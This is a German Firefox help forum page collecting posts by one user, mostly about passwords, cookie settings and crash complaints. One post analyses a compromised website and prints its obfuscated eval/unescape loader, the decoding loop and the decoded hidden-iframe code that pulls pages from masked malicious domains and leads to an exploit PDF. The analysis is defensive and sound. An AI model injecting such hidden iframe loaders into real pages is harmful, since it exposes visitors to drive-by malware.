Beiträge von boardraider

  • Passwortmanager, Passwörter nur auf Unterseiten beziehen

    Auch dabei gilt: ohne Weiteres nicht.
    Der Fx unterschiedet nach Protokollen und (Sub-)Domains (auch Ports). Man müsste daher wieder über eine Erweiterung eingreifen.

    Alternativ kannst du die Einträge wohl auch in der Text-Datei signons3.txt kopieren und so verfügbar machen, das käme aber einem manuellen Aufruf der Seite in Verbindung mit der Eingabe des Passwortes gleich.

  • Shortcut icon

    Mit einer Rewrite-Engine ist es seitenintern durchaus möglich von den Daten- bzw. Verzeichnisstrukturen zu abstrahieren. Extern kann allerdings nur auf andere Domains weitergeleitet werden. Ansonsten wäre das ja ein Fest für Phisher, wenn man die Domain maskieren könnte.
    Ansonsten könnte man natürlich noch eine Art Proxy-Seite nutzen, allerdings müsste man dazu selbst die Inhalte unter der gewünschten Domain verwalten können (ist in dem konkreten Fall leider nicht so).

  • FF macht kein Autologin mehr ...

    pavel_p wrote:

    Zitat

    Cookies werden während der Session angelegt und haben 365 Tage Gültigkeit (sowie ich's in about:config eingestellt hab) <-- "Login Cookies"
    Die anderen Cookie-Typen (php...) haben bis am ende der Sitzung
    ("Beispiel-Screenshot")

    In Bezug auf das "Cookie löschen"


    Laut deinem zweiten Screenshot hast du bei dir network.cookie.lifetimePolicy auf 0, daher kann die Einstellung für network.cookie.lifetime.days eigentlich nicht wirksam sein. Das wäre nur im Falle von network.cookie.lifetimePolicy = 1.
    Da Session-Cookies meist zur Speicherung der Login-Session verwendet und diese beim Schließen gelöscht werden, wundert es nicht, dass du dich dann wieder neu einloggen musst.

    Ansonsten:
    Nenne eine betroffene Seite, bei der die Login-Session nicht in Session-Cookies gespeichert werden, also die Seite die Option anbietet die Session dauerhaft zu speichern.
    Hilft das Löschen der cookies.sqlite?

  • Werbung... So?

    Man sollte dann in dem Zusammenhang auch die Ursachen der "Unzulänglichkeiten" betrachten. Da der Fx in den meisten Fällen nicht die Ursache darstellt, dürfte das weniger ein Argument sein. Oder welche Unzulänglichkeiten stören dich im Speziellen?
    Man bedenke auch, dass sich die Millionen User ohne Probleme nicht hier im Forum melden...

  • FF stürzt seit dem Update von 3.07 auf 3.08 immer ab!!!

    Shinwa wrote:

    Zitat

    Wenn man so wirbt, wie Firefox wirbt, dann sollte man das Teil auch Idiotensicher machen.

    Für Fehler anderer kann der Fx nichts, in den seltensten Fällen hier kann der Fx als Fehlerquelle ausgemacht werden. Meist sind es Fehlkonfigurationen am Fx, am System oder an Programmen von Drittanbietern.

    Zitat

    Ich erwarte, dass man einem hilft wenn Probleme auftauchen und zwar so, dass auch jemand ohne Informatikstudium das versteht. Das ist hier ja nicht der Fall.

    Dann bezahl für Support! Wenn du mit der Hilfe hier nicht zu recht kommst, dann ist das die beste Lösung.

    Zitat

    Deswegen wird man sich wohl einen ordentlichen Browser suchen müssen

    Mach ruhig, dann bleiben uns zumindest deine unsinnigen Tiraden erspart ;)

    Zitat

    Merkwürdig, ich dachte immer mit Updates sollten Probleme beseitigt werden und nicht neue schwerwiegendere auftauchen.

    Komisch, dass es Millionen von Usern ohne Probleme gibt. Aber die melden sich natürlich hier nicht :roll:

    Zitat

    Als jemand, der das Internet für seine Forschungen z.T. benötigt, kann ich Firefox NICHT empfehlen!!!

    Brauchst du auch nicht, auf unqualifizierte Äußerungen braucht man eigentlich keinen Wert legen.

  • ebay Seiten laden nicht - alle anderen Seiten schon

    Zitat

    Ich hoffe, dass die Programmierer von Firefox die Beschwerden in diesem Forum auch zu lesen bekommen

    Da das Problem nicht beim Fx liegt, dürfte es die Entwickler wenig betreffen. Entweder sind externe Programme (siehe Thread) oder die eBay-Server dafür verantwortlich. Mir ist kein einziger Fall bekannt, in dem ein Fehler reproduzierbar auf den Fx zurückzuführen ist.

    Die von dir genannte Meldung hat (wie offensichtlich zu lesen) mit der eBay-Seite nicht das geringste zu tun. Zudem ist es nur ein CSS-Problem.

    Ansonsten:
    http://www.firefox-browser.de/wiki/Problemdiagnose

  • Attackierend gemeldete Website - Ratlos!?

    Simon1983 wrote:

    Zitat

    Aufgefallen ist mir folgendes:

    Code
    <body><script>eval(unescape('%u002f%u002a%u0068%u006b%u0069%
...


    Ergibt (von Kommentaren bereinigt und Variableninhalt verkürzt) zunächst:

    Code
    var yivxy="09020818...1149";
var slxdr="";
for(var hajxnr=3;hajxnr<yivxy.length;hajxnr+=3)
  slxdr+=String.fromCharCode(yivxy.substring(hajxnr,hajxnr+3)-yivxy.substring(0,3));
setTimeout("eval(slxdr);",100);


    Die Variable yivxy enthält eine weitere Kodierung, die über die Schleife aufgelöst wird. Der Inhalt der Variablen slxdr wird im Anschluss dann ausgewertet und ergibt (Link maskiert):

    Code
    var q0=document.createElement('iframe');
q0.src='h**p://bestfindahome.cn/home.html';
q0.style.display='none';
document.body.appendChild(q0);


    Eine Einbindung über IFrame, die wieder auf kodierten JS-Code führt. Diesen ausgewertet (verkürzt und bereinigt) ergibt:

    Code
    s = ">khtcog\"ute?)jvvr...khtcog@";
for(i=/0; i<s.length;i++) { document.write(String.fromCharCode(s.charCodeAt(i)-2)); }


    Der Code schreibt wiederum zwei IFrames in die Seite (Links maskiert):

    Code
    <iframe src='h**p://bestfindahome.cn/kitchen.html' width='0' height='0'></iframe><iframe src='h**p://bestfindahome.cn/watchman.html' width='0' height='0'></iframe>


    Der erste IFrame enthält dann wieder eine solche Kodierung und führt zu einer IFrame-Einbindung der Seite h**p://http://tixwagoq.cn/in.cgi?4
    Dort findet sich dann schließlich die Weiterleitung zu dem mit Schadcode behafteten PDF.

    Zitat

    Nun, beim betreten deiner Seite bekam ich erstmal einen PDF Download präsentiert.

    Es ist nicht empfehlenswert (insbesondere für unbedarfte User) so eine Seite mit Produktivsystemen oder ohne zusätzliche Vorkehrungen zu betreten. Man sollte sich nicht auf AV/FW-Software verlassen, auch 0day-Lücken könnten dort ausgenutzt werden. In einem so gelagerten Fall sollte man vor allem weder mit aktivierten Plugins noch mit aktivem JS die Seite aufrufen.
    Ist übrigens hier auch einmal ein Beispiel, dass die Nützlichkeit von NoScript verdeutlicht.

  • [Ext] Ubiquity

    Maddin_e wrote:

    Zitat

    ich hab ein Problem mit dem addon Ubiquity und Noscript
    wenn ich was "mappen" will, zeigt er mir nicht die Karte an, sondern nur den Rahmen.
    [...]Ich solle doch einfach maps.stcstm.org erlauben.

    Das ist nicht zutreffend, für das map-Kommando muss google zugelassen sein (man kann es ggf. auf die Subdomains maps und www beschränken).

    Zitat

    bei dem erstem Bild sieht man, dass er mir nicht erlaubt maps.stcstm.org zu erlauben.
    bei dem zweitem mal hab ich es einfach mit stcstm.org probiert -> ging auch nicht.
    beim drittem mal hab ichs mit irgendeiner Adresse probiert (hab einfach mal ein "m" vorgesetzt) und siehe da: ich kann die Seite zu der Positivliste hinzufügen ...
    was ist da los?
    hat noscript irgendwas gegen die seite?

    Das ist kein NoScript-Thread. Daher wäre es besser bzgl. der Problematik einen neuen Thread zu eröffnen. Vorab kann ich aber das angegebene Verhalten mit der aktuellen offiziellen Version nicht bestätigen und nachvollziehen.